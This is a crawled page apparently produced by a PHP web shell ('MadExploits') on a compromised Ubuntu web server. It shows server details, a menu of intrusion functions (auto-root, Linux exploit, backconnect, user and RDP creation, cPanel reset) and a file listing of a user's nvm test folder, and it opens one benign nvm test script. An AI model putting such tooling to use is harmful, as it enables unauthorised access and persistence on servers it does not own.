Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ayush23027 /
.nvm /
test /
fast /
Listing versions /
[ HOME SHELL ]
Name
Size
Permission
Action
Running 'nvm ls --no-alias' do...
896
B
-rwxr-xr-x
Running 'nvm ls --no-alias' wi...
500
B
-rwxr-xr-x
Running 'nvm ls 0.0.2' should ...
411
B
-rwxr-xr-x
Running 'nvm ls 0.2' should di...
861
B
-rwxr-xr-x
Running 'nvm ls foo' should re...
73
B
-rwxr-xr-x
Running 'nvm ls io' should ret...
56
B
-rwxr-xr-x
Running 'nvm ls node_' should ...
59
B
-rwxr-xr-x
Running 'nvm ls stable' and 'n...
902
B
-rwxr-xr-x
Running 'nvm ls system' should...
558
B
-rwxr-xr-x
Running 'nvm ls' calls into nv...
890
B
-rwxr-xr-x
Running 'nvm ls' should displa...
1.24
KB
-rwxr-xr-x
Running 'nvm ls' should filter...
192
B
-rwxr-xr-x
Running 'nvm ls' should filter...
199
B
-rwxr-xr-x
Running 'nvm ls' should includ...
530
B
-rwxr-xr-x
Running 'nvm ls' should list v...
320
B
-rwxr-xr-x
Running 'nvm ls' should not sh...
819
B
-rwxr-xr-x
Running 'nvm ls' with node-lik...
188
B
-rwxr-xr-x
Running 'nvm ls' with nounset ...
622
B
-rwxr-xr-x
Using a nonstandard IFS should...
297
B
-rwxr-xr-x
teardown
384
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Running 'nvm ls' calls into nvm_alias
#!/bin/sh \. ../../../nvm.sh \. ../../common.sh die () { echo "$@" ; unset -f nvm_ls nvm_list_aliases; exit 1; } make_fake_node v0.12.87 || die 'fake v0.12.87 could not be made' make_fake_node v0.12.9 || die 'fake v0.12.9 could not be made' make_fake_iojs v0.1.2 || die 'fake iojs-v0.1.2 could not be made' make_fake_iojs v0.10.2 || die 'fake iojs-v0.10.2 could not be made' set -e nvm_list_aliases() { echo 'sd-6' } # sanity check OUTPUT="$(nvm alias)" EXPECTED_OUTPUT='sd-6' [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "1: expected >${EXPECTED_OUTPUT}<; got >${OUTPUT}<" nvm_ls() { echo v0.12.87 echo v0.12.9 echo iojs-v0.1.2 echo iojs-v0.10.2 } OUTPUT="$(nvm ls --no-colors)" EXPECTED_OUTPUT=" v0.12.87 * v0.12.9 * iojs-v0.1.2 * iojs-v0.10.2 * sd-6" [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "2: expected >${EXPECTED_OUTPUT}<; got >${OUTPUT}<"
Close